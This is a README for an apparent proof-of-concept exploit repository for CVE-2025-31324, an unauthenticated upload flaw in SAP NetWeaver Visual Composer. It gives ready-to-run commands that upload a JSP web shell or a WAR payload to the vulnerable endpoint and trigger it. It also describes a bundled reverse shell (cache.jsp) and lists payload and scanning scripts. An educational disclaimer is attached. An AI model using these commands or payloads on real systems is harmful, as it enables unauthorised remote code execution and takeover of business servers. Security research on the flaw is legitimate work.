Proof-of-Concept for CVE-2025-31324: Unauthenticated upload in SAP NetWeaver Visual Composer Metadata Uploader# CVE-2025-31324_PoC
Proof-of-Concept for CVE-2025-31324: Unauthenticated upload in SAP NetWeaver Visual Composer Metadata Uploader
This script performs:
1. File upload to the vulnerable endpoint (via Upload host/port)
2. Optional trigger via HTTP GET (via Trigger host/port)
3. Basic response validation/logging
Usage example:
python3 PoC.py \
--host sap.example.com --port 50000 \
--endpoint /irj/portal/sap/bc/webdynpro/sap/ZWDC_METADATA_UPLDR \
--file EvilPayload.war \
--trigger-path /irj/portal/irj/servlet_jsp/irj/root/EvilPayload/shell.jsp \
--trigger-host sap.example.com --trigger-port 50001 --trigger-https true \
--bypass-portal
python3 PoC.py --host sap.example.com --port 50000 \
--endpoint /developmentserver/metadatauploader \
--file shell.jsp \
--trigger-path /visual_composer/shell.jsp \
--trigger-host sap.example.com --trigger-port 50001 --trigger-https
You also have the ability to upload a .war file if that is how you would like to execute. cache.jsp is a reverse shell that will give you aceess once inside the system. (Still working out issues there)
# Disclaimer
This is intended for educational purposes only and should not be used for any malicious activities. Always ensure you have the necessary permissions and follow ethical guidelines when testing or researching security vulnerabilities.
For any questions or clarifications, please feel free to reach out. Stay safe and secure!
[4.0K] /data/pocs/f5eac7d3e99d38acb498e28334cf702f94d661bc
├── [ 398] cache.jsp
├── [ 898] CheckForEndpoints.sh
├── [4.0K] EvilPayload
│ ├── [ 86] metadata.xml
│ ├── [4.0K] META-INF
│ │ └── [ 59] MANIFEST.MF
│ ├── [4.0K] pages
│ │ └── [ 399] shell.jsp
│ └── [4.0K] WEB-INF
│ └── [ 430] web.xml
├── [1.0K] LICENSE
├── [4.8K] PoC.py
├── [1.4K] README.md
└── [ 963] ScanForVisualComposer.sh
4 directories, 10 files